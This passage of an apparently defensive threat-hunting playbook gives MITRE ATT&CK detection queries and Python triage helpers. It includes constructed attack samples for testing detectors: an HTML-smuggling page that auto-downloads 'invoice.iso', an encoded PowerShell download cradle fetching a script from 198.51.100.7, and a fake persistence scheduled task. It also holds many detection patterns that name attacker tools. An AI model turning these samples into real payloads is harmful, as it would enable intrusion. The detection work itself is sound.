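    rng = random.Random(7)   # fixed seed so the sample is reproducible
    blob = base64.b64encode(bytes(rng.getrandbits(8) for _ in range(120_000))).decode()
    smuggled = (b"<html><body><script>var b='" + blob.encode() + b"';"
                b"var a=document.createElement('a');"
                b"a.href='data:application/octet-stream;base64,'+b;"
                b"a.download='invoice.iso';a.click();</script></body></html>")
    plain = b"<html><body>" + b"<p>Quarterly report, section text.</p>" * 7000 + b"</body></html>"
    small = smuggled[:12_000] + b"';</script></body></html>"
    return smuggled, plain, small


SMUGGLED_HTML, PLAIN_HTML, SMALL_SMUGGLED_HTML = _make_samples()

if __name__ == "__main__":
    for name, content in (("smuggled", SMUGGLED_HTML), ("plain", PLAIN_HTML), ("small", SMALL_SMUGGLED_HTML)):
        flagged = html_smuggling_candidate("C:\\Users\\bob\\Downloads\\invoice.html", content)
        print(f"{name}: {len(content)} bytes, entropy {shannon_entropy(content):.2f}, flagged={flagged}")
```

Base64 text tops out near 6 bits per byte, which is why the card's threshold sits at 5: it separates encoded payloads from markup and prose without needing a 1 MB file. The small-sample miss is the caveat to keep in mind when tuning the size floor downward.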
T1091

Replication Through Removable Media

[MITRE]

Why they do it: Adversaries copy malware to removable media and rely on users to plug it into other systems โ€” frequently used to bridge air-gapped networks.

[KQL] File access on removable storage (4663 with this object type requires the Audit Removable Storage subcategory)
event.code: 4663 AND "removable storage"
event.code: 4688 AND NOT winlog.event_data.NewProcessName: <normal drive>:*
T1659

Content Injection

[MITRE]

Why they do it: Adversaries inject malicious code into legitimate websites, advertising networks, or CDNs that targeted users visit, allowing code to execute via trusted sources.

[KQL] DNS queries to suspicious CDN/malvertising domains (the patterns are placeholders; substitute your threat-intel list)
event.dataset: "network_traffic" AND dns.question.name: (*suspicious-cdn* OR *malvertising* OR *adserver*) AND NOT dns.question.name: (*google* OR *akamai*)
[Arkime] Hidden iframes in HTTP responses (unencrypted traffic only; this is a packet-content hunt pattern, not a session-metadata expression)
http.response.body contains "<iframe src=" AND (http.response.body contains "hidden" OR http.response.body contains "width=0" OR http.response.body contains "display:none")
T1189

Drive-by Compromise

[MITRE]

Why they do it: Also known as "Watering Hole" attack โ€” adversaries compromise a legitimate website targeting a specific group. Merely browsing executes an exploit against the user's browser.

[KQL] Web browsers spawning command-line tools or scripting engines
process.parent.name: ("chrome.exe" OR "msedge.exe" OR "firefox.exe" OR "iexplore.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "wscript.exe" OR "cscript.exe" OR "certutil.exe" OR "mshta.exe")
[KQL] Browsers making outbound connections on non-standard ports (Sysmon event 3)
winlog.event_id: 3 AND process.name: ("chrome.exe" OR "msedge.exe") AND NOT destination.port: (80 OR 443 OR 8080)
[Arkime] Suspicious redirects or exploit-kit traffic patterns
http.response.code == 302 AND http.location contains "http://" AND http.location matches "[a-zA-Z0-9]{15,}\.(info|xyz|top)"
T1195

Supply Chain Compromise

[MITRE]

Why they do it: Adversaries manipulate a third-party product prior to delivery. When the org installs the trusted update (e.g., SolarWinds), they unwittingly install malware. Detected behaviorally post-compromise.

[KQL] Trusted vendor applications spawning shells anomalously
process.parent.name: ("SolarWinds.BusinessLayerHost.exe" OR "kaseya.exe" OR "TaniumClient.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "whoami.exe")
[KQL] Trusted servers making abnormal DNS requests (C2 beacon indicator; replace 10.0.x.x with the management server's IP, and note that KQL has no comment syntax)
event.dataset: "dns" AND dns.question.name: * AND source.ip: "10.0.x.x"
T1199

Trusted Relationship

[MITRE]

Why they do it: Adversaries breach a third-party partner or MSP that has an authorized connection into the target org, bypassing the primary perimeter.

[KQL] Administrative logins from partner IP ranges during off-hours (198.51.100.0/24 is an example MSP range; add your own time-window filter)
source.ip: "198.51.100.0/24" AND event.category: "authentication" AND event.outcome: "success" AND (user.name: "*admin*" OR user.name: "*svc*")
[Arkime] Large unexpected data transfers over B2B VPN tunnels (sessions larger than 10 MB)
ip.src == [Trusted_Partner_IP] && bytes >= 10000000
T1669

Wi-Fi Networks

[MITRE]

Why they do it: Adversaries exploit Wi-Fi to gain access from the parking lot โ€” cracking WPA keys, setting up Evil Twin APs, or exploiting Wi-Fi infrastructure vulnerabilities.

[KQL] WLAN AutoConfig failed connections to the corporate SSID (event 8002; 8001 is a successful connection)
winlog.channel: "Microsoft-Windows-WLAN-AutoConfig/Operational" AND winlog.event_id: 8002
[Wireshark] Deauthentication (0x0c) and disassociation (0x0a) frames, used to force a disconnect and redirect clients to a rogue AP
wlan.fc.type_subtype == 0x0c || wlan.fc.type_subtype == 0x0a
Execution TA0002
Techniques that result in adversary-controlled code running on a local or remote system. Often paired with other tactics to achieve broader goals like exploration or data theft.
T1059

Command and Scripting Interpreter

[MITRE]

Why they do it: Adversaries abuse built-in interpreters (PowerShell, cmd, Bash, Python, VBScript) to run arbitrary commands; this "Living off the Land" approach avoids dropping custom malware.

[KQL] mstsc.exe used for command execution (observed with Cobalt Strike; baseline normal RDP client use first)
mstsc.exe
[KQL] PowerShell executing remote commands or IEX
process.name: powershell.exe AND process.command_line: (*Start-Process* OR *Invoke-Command* OR *IEX*)
T1059.001

Command and Scripting: PowerShell

[MITRE]

What to look for: Obfuscated command lines, encoded commands, download cradles, non-interactive execution, PowerShell remoting.

[KQL] PowerShell script block and module logging: events 4104/4103 (require Script Block Logging and Module Logging to be enabled)
event.code: (4104 OR 4103)
[KQL] Encoded/hidden PowerShell commands (obfuscation)
process.name: ("powershell.exe" OR "pwsh.exe") AND process.command_line: (*-enc* OR *-EncodedCommand* OR *-w hidden* OR *DownloadString* OR *-ExecutionPolicy Bypass*)
[KQL] PowerShell not spawned by Explorer (unusual parent; Sysmon 1 and Security 4688 are the process-creation events)
event.code: (1 OR 4688) AND process.name: powershell.exe AND NOT process.parent.name: explorer.exe
[KQL] PowerShell remoting / WinRM execution
winlog.task: "Execute a Remote Command"
"Enable-PSRemoting"
winrm AND "Invoke-Command*"
process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND winlog.event_data.Payload: *
[KQL] PowerShell process start events (baseline / broad)
(event.type: "process_start" AND process.name: "powershell.exe") OR (event.type: "process_start" AND process.name: "pwsh.exe") OR (event.type: "process_start" AND process.name: "powershell_ise.exe")
[KQL] PowerShell IEX (Invoke-Expression): common download-and-execute pattern (free-text search)
powershell AND iex
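The encoded-command query above only tells you that -enc was used; the decode that turns the base64 into something a hunter can read is below, as an added example in Python (not code from the original playbook). PowerShell accepts any unambiguous prefix of -EncodedCommand (and -ec), so the matcher covers the prefixes rather than just "-enc", the payload is decoded as UTF-16LE, and download-cradle markers are then checked across both the raw command line and the decoded script. The marker list and the sample command lines are assumptions constructed for the example.

```python
import base64
import binascii
import re

# PowerShell accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus -ec; "/" works as well as "-".
_ENC_SWITCHES = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)])
_ENC_RE = re.compile(r"(?<!\S)[-/](?:%s)\s+([A-Za-z0-9+/=]+)" % _ENC_SWITCHES, re.IGNORECASE)

# Name -> regex, matched against the lower-cased command line plus decoded script.
CRADLE_MARKERS = {
    "downloadstring": r"downloadstring",
    "downloadfile": r"downloadfile",
    "invoke-webrequest": r"invoke-webrequest|\biwr\b",
    "iex": r"\biex\b|invoke-expression",
    "net.webclient": r"net\.webclient",
    "frombase64string": r"frombase64string",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "bypass-policy": r"-e(?:p|x|xec|xecutionpolicy)\s+bypass",
}


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -e/-enc/-EncodedCommand, or None if absent or undecodable."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))   # tolerate stripped padding
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_powershell(cmdline: str) -> dict:
    """Decode if encoded, then report which cradle/evasion markers appear anywhere in the command."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + (decoded or "")).lower()
    markers = sorted(name for name, pat in CRADLE_MARKERS.items() if re.search(pat, haystack))
    return {"encoded": decoded is not None, "decoded": decoded, "markers": markers}


# Constructed sample command lines (not real telemetry); the URL is a documentation address.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
BENIGN_CMDLINE = 'powershell.exe -NoProfile -File "C:\\Scripts\\nightly-backup.ps1"'

if __name__ == "__main__":
    for line in (ENCODED_CMDLINE, BENIGN_CMDLINE):
        result = triage_powershell(line)
        print(f"encoded={result['encoded']} markers={result['markers']}")
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Keep the decoded script, not just the verdict: script block logging (4104) will show the same text if it is enabled, but on hosts where it is not, the process command line is the only copy you have.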
T1059.003

Command and Scripting: Windows Command Shell

[MITRE]
[KQL] cmd.exe process activity (broad)
process.name: cmd.exe
[KQL] cmd.exe with output redirected to an admin share (the pattern used by wmiexec/smbexec-style remote execution)
event.code: 1 AND process.command_line: (*cmd.exe\ \/Q\ \/c\ *\ 1\ \\\\*\\*\\*\ 2\&1 OR *cmd.exe\ \/C\ *\ \ \\\\*\\*\\*\ 2\&1)
[KQL] cmd.exe with curl (download indicator)
event.code: 1 AND process.command_line: *curl*
T1059.005

Command and Scripting: Visual Basic

[MITRE]
[KQL] VBScript interpreters running, Office parents, and vbscript.dll activity
process.name: (cscript.exe OR wscript.exe)
process.parent.name: (winword.exe OR powerpnt.exe OR excel.exe OR onenote.exe)
event.type: creation AND event.category: file AND file.name: *vb script.dll*
T1059.006

Command and Scripting: Python

[MITRE]
[KQL] Python interpreter execution on Windows
(event.type: "process_start" AND process.name: "python.exe") OR (event.type: "process_start" AND process.name: "python3.exe")
T1047

Windows Management Instrumentation (WMI)

[MITRE]

Why they do it: WMI allows remote execution, persistence, and reconnaissance. Adversaries abuse it because WMI activity is rarely blocked by security tools and looks legitimate.

[KQL] Native enumeration commands spawned by WMI (wmiprvse.exe parent)
event.type: "start" AND process.command_line: * AND process.name: ("arp.exe" OR "dsquery.exe" OR "gpresult.exe" OR "hostname.exe" OR "ipconfig.exe" OR "nbtstat.exe" OR "net.exe" OR "netsh.exe" OR "netstat.exe" OR "nltest.exe" OR "ping.exe" OR "quser.exe" OR "qwinsta.exe" OR "reg.exe" OR "sc.exe" OR "systeminfo.exe" OR "tasklist.exe" OR "whoami.exe") AND process.parent.name: "wmiprvse.exe"
[KQL] Suspicious cmd.exe execution via WMI
event.type: "start" AND process.parent.name: "WmiPrvSE.exe" AND process.name: "cmd.exe"
[KQL] WMI-related process names
process.name: ("wmic.exe" OR "powershell.exe" OR "wbemtool.exe" OR "wmiprvse.exe" OR "wmiadp.exe" OR "scrcons.exe")
process.command_line: (wmic OR get-wmi* OR get-cim*)
[KQL] WMI-related event IDs
event.code: (4688 OR 4656 OR 4103 OR 800)
-- Microsoft-Windows-WMI-Activity/Operational:
event.code: (5857 OR 5858 OR 5861)
  5857: WMI provider loaded (watch for unusual provider DLL paths)
  5858: WMI query error (ResultCode), including failed queries
  5861: New permanent event consumer (WMI subscription) registered; the key persistence indicator
T1053

Scheduled Task/Job

[MITRE]

Why they do it: Adversaries abuse task scheduling to execute code at a specific time, recurring schedule, or at startup. Also used for Persistence.

[KQL] Scheduled task creation, modification, deletion: key event IDs
event.code: (4698 OR 4699 OR 4700 OR 4701 OR 4702 OR 106 OR 140 OR 141)
  Security log: 4698 task created | 4699 task deleted | 4700 task enabled | 4701 task disabled | 4702 task updated
  Microsoft-Windows-TaskScheduler/Operational: 106 task registered | 140 task updated | 141 task deleted
[KQL] schtasks.exe creating tasks
process.name: schtasks.exe AND process.args: /create
process.name: ("schtasks.exe" OR "at.exe" OR "Taskeng.exe")
[KQL] Scheduled task pointing to PowerShell or CMD (suspicious; 4698 carries the task definition XML in TaskContent, not process fields)
event.code: 4698 AND winlog.event_data.TaskContent: (*powershell* OR *cmd.exe*) AND NOT winlog.event_data.TaskName: (*Reboot* OR *Defrag*)
[KQL] Task creation via command line pointing to temp/appdata
(process.name: "schtasks.exe" AND process.command_line: "* /create *" AND process.command_line: ("*AppData*" OR "*Temp*" OR "*ProgramData*")) OR winlog.event_id: 4698
[KQL] T1053.005 Scheduled Task: schtasks.exe with create/change/delete args (Windows has no TaskScheduler.exe process; the Task Scheduler service runs inside svchost.exe)
(event.type: "process_start" AND process.name: "schtasks.exe") AND (process.command_line: "* /Create *" OR process.command_line: "* /Change *" OR process.command_line: "* /Delete *")
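The 4698 queries above match on strings inside TaskContent; the XML itself carries the fields a hunter actually pivots on (the Exec command and arguments, the run level, and the trigger type). The Python below, added here as an example and not code from the original playbook, parses that XML with the task schema namespace and scores a task the way the cards describe: interpreter as the action, user-writable path, encoded arguments, HighestAvailable run level, logon/boot trigger. The two sample events are constructed; the indicator lists are assumptions.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
PERSISTENCE_TRIGGERS = {"LogonTrigger", "BootTrigger", "RegistrationTrigger"}


def parse_task_content(xml_text: str) -> dict:
    """Extract (command, arguments) actions, run level and trigger types from 4698 TaskContent.
    The XML declaration (encoding="UTF-16") is dropped because the string is already decoded."""
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    actions = [((e.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip(),
                (e.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip())
               for e in root.findall("t:Actions/t:Exec", TASK_NS)]
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=TASK_NS)
    triggers_el = root.find("t:Triggers", TASK_NS)
    triggers = [] if triggers_el is None else [c.tag.split("}")[-1] for c in triggers_el]
    return {"actions": actions, "run_level": run_level, "triggers": triggers}


def triage_4698(event: dict) -> dict:
    """Score one 4698 event (Winlogbeat field names) and return the reasons it looks suspicious."""
    task = parse_task_content(event["winlog.event_data.TaskContent"])
    reasons = []
    for command, arguments in task["actions"]:
        exe = ntpath.basename(command.strip('"')).lower()
        blob = (command + " " + arguments).lower()
        if exe in INTERPRETERS:
            reasons.append("interpreter:" + exe)
        if any(d in blob for d in USER_WRITABLE):
            reasons.append("user-writable-path")
        if re.search(r"\s-e(?:nc(?:odedcommand)?)?\s", blob):
            reasons.append("encoded-command")
    if task["run_level"].lower() == "highestavailable":
        reasons.append("runlevel:highest")
    if PERSISTENCE_TRIGGERS & set(task["triggers"]):
        reasons.append("persistence-trigger")
    return {"task": event["winlog.event_data.TaskName"],
            "creator": event["winlog.event_data.SubjectUserName"], "reasons": reasons}


# Constructed sample 4698 events (not real telemetry).
MALICIOUS_4698 = {
    "winlog.event_data.SubjectUserName": "bob",
    "winlog.event_data.TaskName": "\\Microsoft\\Windows\\Updater",
    "winlog.event_data.TaskContent": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1-2-3-1001</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command><Arguments>-nop -w hidden -File C:\\Users\\Public\\update.ps1</Arguments></Exec></Actions>
</Task>""",
}
BENIGN_4698 = {
    "winlog.event_data.SubjectUserName": "SYSTEM",
    "winlog.event_data.TaskName": "\\Contoso\\NightlyBackup",
    "winlog.event_data.TaskContent": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>"C:\\Program Files\\Contoso\\backup.exe"</Command><Arguments>/full</Arguments></Exec></Actions>
</Task>""",
}

if __name__ == "__main__":
    for ev in (MALICIOUS_4698, BENIGN_4698):
        print(triage_4698(ev))
```

Parsing the XML rather than substring-matching it also avoids the false negative where the task name looks like a Microsoft path (as in the constructed sample) while the action points somewhere a user can write.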
T1106

Native API

[MITRE]

Why they do it: Instead of command-line tools (heavily monitored), adversaries write malware that calls OS Native APIs directly (e.g., CreateProcess, VirtualAlloc) to execute payloads stealthily.

[KQL] Suspicious process access to LSASS or Explorer (injection indicator; Sysmon event 10, with GrantedAccess values common in credential-dumping and injection tooling)
winlog.event_id: 10 AND winlog.event_data.TargetImage: ("*lsass.exe" OR "*explorer.exe") AND winlog.event_data.GrantedAccess: ("0x1FFFFF" OR "0x1438")
[KQL] Native API abuse via common proxy executables (4688 process creation, 4689 process exit)
(event.code: 4688 OR event.code: 4689) AND process.name: ("*\\rundll32.exe" OR "*\\regsvr32.exe" OR "*\\mshta.exe" OR "*\\cscript.exe" OR "*\\wscript.exe" OR "*\\powershell.exe" OR "*\\cmd.exe")
T1204

User Execution

[MITRE]

Why they do it: Adversaries rely on the user to take action (clicking a link, opening a payload, enabling macros). Includes CHM files (.chm) loaded by hh.exe.

[KQL] CHM files loaded by HTML Help (hh.exe): suspicious delivery
process.name: "hh.exe" AND NOT destination.ip: (<MP IPs>) AND NOT dns.question.name: "localhost"
event.type: "start" AND process.parent.name: "hh.exe" AND process.name: ("mshta.exe" OR "cmd.exe" OR "powershell.exe" OR "cscript.exe" OR "wscript.exe")
[KQL] T1204.002 Malicious File: files downloaded by a browser (rule name as used in this playbook; replace <browser exe> with the browser process)
rule.name: "Downloads" AND process.name: <browser exe> AND file.name: *
[KQL] Office macro security settings tampered via the registry (VbaWarnings=1 enables all macros; AccessVBOM=1 trusts access to the VBA project object model)
event.type: "change" AND registry.path: ("HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\AccessVBOM" OR "HKU\\S-1-5-21-*\\SOFTWARE\\Microsoft\\Office\\*\\Security\\VbaWarnings") AND registry.data.strings: "0x00000001" AND process.name: ("cscript.exe" OR "wscript.exe" OR "mshta.exe" OR "winword.exe" OR "excel.exe")
T1559.002

Dynamic Data Exchange (DDE)

[MITRE]

Why they do it: DDE allows applications to share data and can be abused in Office documents to execute commands without macros.

[KQL] DDE abuse indicators: cmd launching calc, winword with -nop download, PowerShell spawned by Word
(process.command_line: (*cmd.exe* AND *calc.exe*)) OR (process.command_line: (*winword.exe* AND *-nop* AND *download*)) OR (process.name: powershell.exe AND process.parent.name: winword.exe)
T1569

System Services

[MITRE]

Why they do it: Adversaries abuse the Service Control Manager (sc.exe) or Linux systemd to execute malicious commands, often with SYSTEM privileges.

[KQL] New service created via command line with a suspicious binPath (7045 is written to the System log)
(process.name: "sc.exe" AND process.command_line: "* create *" AND process.command_line: "* binPath= *") OR (winlog.event_id: 7045 AND NOT winlog.event_data.ServiceFileName: "*Program Files*")
[KQL] Processes spawned by services.exe or svchost.exe (service execution; very noisy, baseline by child process before alerting)
(event.type: "process_start" AND process.parent.name: "services.exe") OR (event.type: "process_start" AND process.parent.name: "svchost.exe")
[Arkime] Remote service creation via SMB/DCE-RPC (PsExec-style; the svcctl endpoint is the Service Control Manager)
tcp.port == 445 AND dcerpc.endpoint == "svcctl"
T1053.005

Scheduled Task/Job: Scheduled Task

[MITRE]
Adversaries use Windows Task Scheduler (schtasks.exe) to execute commands or programs at specified intervals. Commonly used to establish persistence and execute payloads at login or system startup.
[KQL] schtasks.exe execution: inspect parent process, working directory, and user context
process.name: schtasks.exe
-- Check: parent process, working dir, output redirection, user context, agent.hostname
[KQL] schtasks.exe with create/change/delete args (Windows has no TaskScheduler.exe process)
event.type: "process_start" AND process.name: "schtasks.exe" AND process.command_line: (* /Create * OR * /Change * OR * /Delete *)
T1204.002

User Execution: Malicious File

[MITRE]
Adversaries rely on users opening malicious files (documents, executables, scripts) to execute code. Files are typically delivered via phishing. Monitor for newly downloaded files being opened by users.
KQLBrowser download rule - newly downloaded files opened by user
rule.name: "Downloads" AND process.name: (chrome.exe OR firefox.exe OR msedge.exe OR iexplore.exe) AND file.name: *
T1651

Cloud Administration Command

[MITRE]
Adversaries abuse cloud management interfaces (AWS SSM RunCommand, Azure RunCommand) to execute code on VMs directly from the cloud control plane, bypassing traditional network access controls like RDP/SSH.
KQLCloud API - RunCommand invocations from unusual IAM users
event.dataset: ("aws.cloudtrail" OR "azure.activitylogs") AND event.action: ("RunCommand" OR "SendCommand" OR "runCommand")
KQLSysmon - cloud agent spawning shell on local host
process.parent.name: ("amazon-ssm-agent.exe" OR "WaAppAgent.exe") AND process.name: ("cmd.exe" OR "powershell.exe")
T1609

Container Administration Command

[MITRE]
Adversaries abuse container administration APIs (kubectl exec, docker exec) to run commands inside existing legitimate containers, enabling pivoting, secret theft, or malware installation within the cluster.
KQLK8s Audit - exec/attach to pods
kubernetes.audit.verb: "create" AND kubernetes.audit.objectRef.subresource: ("exec" OR "attach")
ArkimeTraffic to K8s API server from non-admin subnets
tcp.port == 6443 AND NOT ip.src == 10.0.0.0/8
T1610

Deploy Container

[MITRE]
Adversaries deploy entirely new malicious containers into an environment (Docker, K8s, Cloud) to execute code; this is frequently used by cryptomining groups or to deploy proxy infrastructure.
KQLK8s Audit - pods created from unapproved image registries
kubernetes.audit.verb: "create" AND kubernetes.audit.objectRef.resource: "pods" AND NOT container.image.name: (*my-private-registry.com*)
ArkimeContainer image pulls from unexpected external endpoints
http.request.uri contains "/v2/" AND http.request.uri contains "/manifests/" AND dns.qry.name contains "docker.io"
T1675

ESXi Administration Command

[MITRE]
Adversaries execute commands directly on VMware ESXi hypervisors via SSH or the host client, allowing them to manipulate, destroy, or backdoor all virtual machines hosted on the hypervisor.
KQLESXi Syslog - SSH logins and esxcli execution
event.dataset: "vmware.esxi" AND (process.name: "esxcli" OR message: "Accepted password for root from")
ArkimeSSH/Web UI traffic to ESXi hosts from unusual subnets
ip.dst == [ESXi_Host_IP] AND (tcp.port == 22 OR tcp.port == 443)
T1203

Exploitation for Client Execution

[MITRE]
Adversaries exploit vulnerabilities in client applications (Office, browsers, PDF readers) to execute malicious code, typically requiring a user to open a crafted file or visit a malicious webpage.
KQLSysmon - document reader spawning a shell (successful exploit)
process.parent.name: ("AcroRd32.exe" OR "Acrobat.exe" OR "FoxitReader.exe" OR "WINWORD.EXE") AND process.name: ("cmd.exe" OR "powershell.exe" OR "certutil.exe" OR "rundll32.exe")
ArkimePDF with embedded JavaScript served over HTTP
http.response.headers.content_type == "application/pdf" AND http.response.body contains "/JS" AND http.response.body contains "/JavaScript"
T1674

Input Injection

[MITRE]
Adversaries simulate user input (keystrokes, mouse movements) using OS APIs like SendKeys to execute commands, bypassing UI restrictions or interacting with UAC prompts without needing a shell.
KQLPS Script Block - SendKeys API usage for keystroke injection
winlog.event_id: 4104 AND powershell.file.script_block_text: ("*System.Windows.Forms.SendKeys*" OR "*SendWait*")
T1677

Poisoned Pipeline Execution

[MITRE]
Adversaries compromise CI/CD environments (GitHub Actions, Jenkins, GitLab) and modify build pipelines so that when a developer pushes code, the pipeline automatically executes the adversary's malicious code.
KQLAuditbeat - unauthorized changes to CI/CD pipeline config files
event.action: "file_modified" AND file.path: ("*.github/workflows*" OR "*Jenkinsfile*" OR "*.gitlab-ci.yml")
ArkimeBuild runner making anomalous outbound connections (reverse shell/payload download)
ip.src == [Build_Runner_IP] AND NOT tls.handshake.extensions_server_name matches "(github|gitlab|docker|aws)"
T1648

Serverless Execution

[MITRE]
Adversaries execute code in serverless environments (AWS Lambda, Azure Functions) which run outside standard VM monitoring, making them blind spots for traditional EDR; they are often abused for cryptomining or attack proxying.
KQLCloudTrail - Lambda function creation/update from non-CI/CD accounts
event.dataset: "aws.cloudtrail" AND event.action: ("CreateFunction" OR "UpdateFunctionCode" OR "Invoke") AND event.provider: "lambda.amazonaws.com"
T1129

Shared Modules

[MITRE]
Adversaries load malicious payloads via shared libraries (DLLs on Windows, SOs on Linux). By injecting or forcing a legitimate program to load a malicious DLL, execution blends in with trusted processes.
KQLSysmon - native tools executing DLLs from user-writable directories
process.name: ("rundll32.exe" OR "regsvr32.exe") AND process.command_line: ("*AppData*" OR "*Temp*" OR "*ProgramData*")
T1072

Software Deployment Tools

[MITRE]
Adversaries compromise enterprise deployment tools (SCCM, Intune, Ansible, PDQ Deploy) to distribute malware or run commands across the entire network simultaneously, turning IT tools into a weapon.
KQLSysmon - SCCM/Intune agents executing suspicious shells
process.parent.name: ("CcmExec.exe" OR "IntuneManagementExtension.exe") AND process.name: ("powershell.exe" OR "cmd.exe" OR "wscript.exe")
ArkimeLarge binary transfers from deployment servers during off-hours
ip.src == [SCCM_Server_IP] AND tcp.len > 5000000
Persistence TA0003
Techniques adversaries use to keep access to systems across restarts, credential changes, and other interruptions.
T1037

Boot or Logon Initialization Scripts

[MITRE]
KQLRegistry modification adding logon script (UserInitMprLogonScript)
event.code: 4688 AND process.command_line: (*reg* AND *add* AND *Environment* AND *UserInitMprLogonScript*)
-- 4688 only carries the command line when "Include command line in process creation events" is enabled in audit policy
KQLT1037.001 - Registry events for logon script path
event.code: (4657 OR 4656) AND registry.path: *\\Environment\\UserInitMprLogonScript
process.name: reg.exe AND process.command_line: *UserInitMprLogonScript*
event.code: (12 OR 13 OR 14) AND *UserInitMprLogonScript*
T1053

Scheduled Task/Job (Persistence)

[MITRE]
KQLScheduled task event IDs - creation, enable, disable, modify, delete
event.code: (4698 OR 4700 OR 4701 OR 4702 OR 4699)
  4698: Task created | 4700: Enabled | 4701: Disabled | 4702: Modified | 4699: Deleted
KQLProcess creating a scheduled task
process.name: schtasks* AND process.command_line: *create*
process.name: ("schtasks.exe" OR "at.exe" OR "Taskeng.exe" OR "cron" OR "crontab")
KQLschtasks.exe - check parent process, working dir, output location, user context
process.name: schtasks.exe
T1098

Account Manipulation

[MITRE]
KQLPrivileged account password reset remotely (persistence indicator)
event.action: "logged-in" AND event.outcome: "success" AND source.ip: * AND NOT source.ip: ("127.0.0.1" OR "::1") AND winlog.event_data.TargetUserName: (*Admin* OR *super* OR *SVC* OR *DC0* OR *service* OR *DMZ* OR *ADM*)
KQLAccount modification event IDs
event.code: (4738 OR 4728)
  4738: User account changed | 4728: Member added to security-enabled global group
InfoAlso monitor changes to SSH authorized_keys or /etc/ssh/sshd_config on Linux systems
/etc/ssh/sshd_config
~/.ssh/authorized_keys
T1136

Account Creation

[MITRE]
KQLNew user account created (Windows event 4720)
event.code: 4720
KQLAccount created via net user /add command
process.name: net.exe AND process.args: user AND process.args: /add
adduser OR useradd   -- Linux
T1197

BITS Jobs

[MITRE]

Why they do it: Background Intelligent Transfer Service (BITS) can be abused to download payloads or execute programs while evading detection, since it uses Windows native functionality.

KQLbitsadmin.exe usage - downloading and transferring files
process.name: bitsadmin.exe
process.name: bitsadmin.exe AND process.command_line: (*transfer* AND *Download*)
bitsadmin AND (Transfer OR Create OR AddFile OR SetNotifyFlags OR SetNotifyCmdLine OR SetMinRetryDelay OR SetCustomHeaders OR Resume)
KQLPowerShell BITS transfer (Start-BitsTransfer)
powershell AND Start-BitsTransfer
process.name: bitsadmin.exe OR ((process.name: powershell.exe OR pwsh.exe) AND process.command_line: (*payload* OR *autoruns*))
KQLBITS event IDs (requires Sysmon) - job created, updated, deleted
event.code: (59 OR 60 OR 61)
  59: BITS job created | 60: BITS job updated | 61: BITS job deleted
T1505.003

Web Shell

[MITRE]

Why they do it: Adversaries install backdoor scripts on web servers. Web shells provide persistent access and a command interface on the web-hosting system.

KQLWeb server process spawning shells (web shell execution)
event.type: "start" AND process.parent.name: ("w3wp.exe" OR "httpd.exe" OR "nginx.exe" OR "php.exe" OR "php-cgi.exe" OR "tomcat.exe") AND process.name: ("cmd.exe" OR "cscript.exe" OR "powershell.exe" OR "pwsh.exe" OR "wmic.exe" OR "wscript.exe")
KQLBroad web shell detection โ€” known recon/admin tools with web server parent
process.name: ("arp.exe" OR "at.exe" OR "certutil.exe" OR "cmd.exe" OR "cscript.exe" OR "dsquery.exe" OR "find.exe" OR "findstr.exe" OR "hostname.exe" OR "ipconfig.exe" OR "net.exe" OR "net1.exe" OR "netsh.exe" OR "netstat.exe" OR "nltest.exe" OR "nslookup.exe" OR "ping.exe" OR "powershell.exe" OR "reg.exe" OR "rundll32.exe" OR "sc.exe" OR "schtasks.exe" OR "systeminfo.exe" OR "tasklist.exe" OR "whoami.exe" OR "wmic.exe" OR "wscript.exe") AND process.parent.name: ("w3wp.exe" OR "httpd.exe" OR "nginx.exe" OR "php.exe" OR "tomcat.exe")
T1546

Event Triggered Execution

[MITRE]
KQLCOM object hijacking via registry โ€” scrobj.dll loaded into HKCU
(registry.path: "HK*}\\InprocServer32\\" AND registry.data.strings: ("scrobj.dll" OR "C:\\*\\scrobj.dll")) OR (registry.path: ("HKEY_USERS\\*Classes\\*\\InprocServer32\\" OR "HKEY_USERS\\*Classes\\*\\LocalServer32\\" OR "HKEY_USERS\\*Classes\\*\\DelegateExecute\\") AND NOT user.domain: "NT AUTHORITY")
KQLWMI event subscription abuse (ActiveScriptEventConsumer)
